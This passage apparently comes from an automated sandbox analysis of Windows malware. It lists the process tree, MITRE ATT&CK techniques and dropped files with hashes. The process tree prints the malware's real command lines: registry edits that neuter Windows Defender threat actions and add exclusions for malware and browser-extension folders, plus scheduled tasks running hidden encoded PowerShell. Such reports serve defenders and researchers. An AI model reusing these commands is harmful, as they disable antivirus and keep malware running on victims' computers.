  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
- Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2)
  Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"
- Image: C:\Windows\SysWOW64\cmd.exe (level 3)
  Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 4)
  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32
- Image: C:\Windows\SysWOW64\reg.exe (level 3)
  Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64
- Image: C:\Windows\SysWOW64\schtasks.exe (level 2)
  Command line: schtasks /CREATE /TN "gLErrmfbC" /SC once /ST 01:25:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  - Creates scheduled task(s)
- Image: C:\Windows\System32\Conhost.exe (level 3)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Image: C:\Windows\SysWOW64\schtasks.exe (level 2)
  Command line: schtasks /run /I /tn "gLErrmfbC"
- Image: C:\Windows\SysWOW64\schtasks.exe (level 2)
  Command line: schtasks /DELETE /F /TN "gLErrmfbC"
- Image: C:\Windows\SysWOW64\schtasks.exe (level 2)
  Command line: schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 01:42:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\JUrpoUT.exe\" aV /AScbdidub 385118 /S" /V1 /F
  - Creates scheduled task(s)
- Image: C:\Windows\SysWOW64\schtasks.exe (level 2)
  Command line: schtasks /run /I /tn "yfARWRprRqUFWeTGf"
- Image: C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe (level 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
- Image: C:\Users\Admin\AppData\Roaming\explorer.exe (level 1)
  Command line: C:\Users\Admin\AppData\Roaming\explorer.exe
- Image: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe (level 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
- Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (level 1)
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Image: C:\Windows\system32\gpupdate.exe (level 2)
  Command line: "C:\Windows\system32\gpupdate.exe" /force
- Image: C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
- Image: C:\Windows\system32\gpscript.exe (level 1)
  Command line: gpscript.exe /RefreshSystemParam
- Image: C:\Windows\SysWOW64\WerFault.exe (level 1)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5964 -ip 5964
- Image: C:\Windows\windefender.exe (level 1)
  Command line: C:\Windows\windefender.exe
- Image: C:\Windows\system32\msiexec.exe (level 1)
  Command line: C:\Windows\system32\msiexec.exe /V
- Image: C:\Windows\System32\MsiExec.exe (level 2)
  Command line: C:\Windows\System32\MsiExec.exe -Embedding A72D3432818372FEC4460AB2BEAFC938
- Image: C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\JUrpoUT.exe (level 1)
  Command line: C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\JUrpoUT.exe aV /AScbdidub 385118 /S
- Image: C:\Windows\SysWOW64\cmd.exe (level 2)
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- Image: \??\c:\windows\SysWOW64\reg.exe (level 5)
  Command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- Image: C:\Windows\SysWOW64\forfiles.exe (level 3)
  Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- Image: C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
- Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 5)
  Command line: powershell start-process -WindowStyle Hidden gpupdate.exe /force
- Image: C:\Windows\SysWOW64\gpupdate.exe (level 6)
  Command line: "C:\Windows\system32\gpupdate.exe" /force
Network
MITRE ATT&CK Matrix (ATT&CK v13)
- Persistence
  - Create or Modify System Process (2)
    - Windows Service (2)
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Scheduled Task/Job (1)
- Privilege Escalation
  - Create or Modify System Process (2)
    - Windows Service (2)
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
  - Scheduled Task/Job (1)
- Defense Evasion
  - Modify Registry (3)
  - Virtualization/Sandbox Evasion (2)
  - Impair Defenses (1)
    - Disable or Modify System Firewall (1)
  - Subvert Trust Controls (1)
    - Install Root Certificate (1)
- Credential Access
  - Unsecured Credentials (5)
    - Credentials In Files (4)
    - Credentials in Registry (1)
Downloads
- C:\ProgramData\AAFIJKKE
  Filesize: 112KB
  MD5: 87210e9e528a4ddb09c6b671937c79c6
  SHA1: 3c75314714619f5b55e25769e0985d497f0062f2
  SHA256: eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
  SHA512: f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0
- C:\ProgramData\Are.docx
  Filesize: 11KB
  MD5: a33e5b189842c5867f46566bdbf7a095
  SHA1: e1c06359f6a76da90d19e8fd95e79c832edb3196
  SHA256: 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
  SHA512: f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
- C:\ProgramData\freebl3.dll
  Filesize: 669KB
  MD5: 550686c0ee48c386dfcb40199bd076ac
  SHA1: ee5134da4d3efcb466081fb6197be5e12a5b22ab
  SHA256: edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa
  SHA512: 0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e
- C:\ProgramData\mozglue.dll
  Filesize: 593KB
  MD5: c8fd9be83bc728cc04beffafc2907fe9
  SHA1: 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
  SHA256: ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
  SHA512: fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
- C:\ProgramData\nss3.dll
  Filesize: 2.0MB
  MD5: 1cc453cdf74f31e4d913ff9c10acdde2
  SHA1: 6e85eae544d6e965f15fa5c39700fa7202f3aafe
  SHA256: ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
  SHA512: dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
- C:\Users\Admin\1000017002\1d10cce2fa.exe
  Filesize: 2.3MB
  MD5: b01d7f06e2f7e336f12494ae8344f00f
  SHA1: 8a38b4ed1483dbad020d5964a272472eb9c83d1b
  SHA256: fb916f56f8610e2cb4b962141fa3bcf09975bed780b889948dc27270ded41613
  SHA512: b84c8465e2fd14ccb4c7a9c48a9b50b0d88a6b06400e87e0726ac68dbbbad26b285bcb1cafc66b1bbf309b26d801740133d35cd7c0079991f931430a6c5a26ee
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 336B
  MD5: 47324047d9df686b6a0c116399132596
  SHA1: b81a25014beaedc9714e6b66997ef7c35aa57d61
  SHA256: 56e7690be2595d0785345347e46c1263880c4a0d6389375cc86bbe890cce6feb
  SHA512: 1d1e9b5a60febcd5ae486c366ad2d72f9a5bc4bf5c68b69df4759986dc3a23328f4ea132b50f2cd419f7e35ec3a03e85acbd1ffb6f7f90582aa48ad0399a0ee6
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
  Filesize: 152KB
  MD5: 31d63b34ce08e2855d5e09e1d1a12b63
  SHA1: c4f3af4d37a88d81d70a56bd96f17f7937cff891
  SHA256: c6dbee4c33a461ba15368bee92510a21e54a8291632ca6f5a6f9ce64dc04aceb
  SHA512: 7320646409ffe71e39ec433677855fc87da0756eebd93b840b2faf0e339c639cda46ad586be483e47edd98ff5e473d3813bfbf6a3804c53cd2214d719629c735
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
  Filesize: 20KB
  MD5: ffbe9dcb0b1242059cb246255afbb04a
  SHA1: 5d3b6f2658cee279ed6454934c7da4ae42b6873a
  SHA256: 67bc64c2416a214595eb3482033074a3882eb6afdf868fa25660b9f57f2315bc
  SHA512: 3d6993a69b99608cc062c04ac49c436db511b574152d33c56500145402d0138ae02b5d76e39738438d55cc06a96ee7dac73f2cc5ef2d2fbb0f0dec644541df7f
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
  Filesize: 2B
  MD5: d751713988987e9331980363e24189ce
  SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
  SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
  SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
  Filesize: 524B
  MD5: 9c7a27a9a8420d9a3963323f175b4bd5
  SHA1: 85ff616e302e2be75bc0cc707563f3d7b4415c68
  SHA256: 293b18efc38e63b5013ce83541097196361e4a078291e7f2d5e2a354568f9196
  SHA512: 709895b1e8b68d6403f8167eb53bf8fa6833b0ea3accdeea953646114b18a92cb35dc0daaa857ec370cd0c44067cd60df343140ea04e0174e2259fe32a62ed3e
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
  Filesize: 7KB
  MD5: db8c4c0b3d165af8505248780a486656
  SHA1: db267fe0b4d796c6120a69c534ff2c9df4050b34
  SHA256: 16293a0a56cc54dd290c7f0ce323b970a718c894c087a1011f16b1718e8bd1b5
  SHA512: f6d9ea2cb2e103f7afcdb8fb2756743d2c174c1820c4c8462ca42229c43f172e57ad9b4166e81bf62d905e79383e7d58771e4d5ca02d620752aff0e970c16f33
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
  Filesize: 16KB
  MD5: 3915086d53ea8050bbd6645a6fcc81c3
  SHA1: 89ab318fd8c02297d7bb0b25e2da1227bf1275fe
  SHA256: e0b0ee7b6989e1a39aad9114b788bc1bf9806fd7db35e9276258410e1875714d
  SHA512: fa24870558a61de365f87c31a94ef8ea060ec049b77698dcdf4fe75888228cb9f28f7671684083913feab34ace2b09a3bea07be0d4708812ddd7dfdb56d8fb56
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
  Filesize: 256KB
  MD5: 13fb40c1e14a667be7d1fbce1e0ab307
  SHA1: d94d656b17f0d72490fdbdfd692e7ccef53cbfb8
  SHA256: 3f90e2bda43f41bc0539643092d3ccac4d771a8788fe3fa50c4c1810e11f2cad
  SHA512: 8f4defb68ebd1aab9758b539328bb2637ef2b910124b6761ebcfebb2b6dce7d25b5f77c1149ebd903c301da205a0209cf01b6b50dab0a20773e79c3622c8db44
- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\additional_file0.tmp
  Filesize: 2.5MB
  MD5: 15d8c8f36cef095a67d156969ecdb896
  SHA1: a1435deb5866cd341c09e56b65cdda33620fcc95
  SHA256: 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
  SHA512: d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a
- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\opera_package
  Filesize: 103.9MB
  MD5: b7e7c07657383452919ee39c5b975ae8
  SHA1: 2a6463ac1eb8be1825b123b12f75c86b7fff6591
  SHA256: 1d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9
  SHA512: daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39
- C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
  Filesize: 1.8MB
  MD5: 863fdb1b3a20d1061ab13283438ff9ba
  SHA1: 976b66a2ce413ca6b8514b369f68eb4a237c1436
SHA2564b06de871b297f9208c7211bf674b239fa8c83a6996746d6991bbdaa884a0e67
SHA512a0cce4013b2e76af00ba61fa9b72e9e27341d15d7de6d834f2289329d69ec3e9b0f41a4f1f60f2506a94f0c0114e626c20b49307fd81083b2189405b1e1f858c
-
C:\Users\Admin\AppData\Local\Temp\1000016001\06e517567e.exeFilesize
1.1MB
MD57e2b4eb527b1cf2edc34f7a38a13f374
SHA13903a5f06782cd23ccfc7f97a5fee37fb3ff0f5f
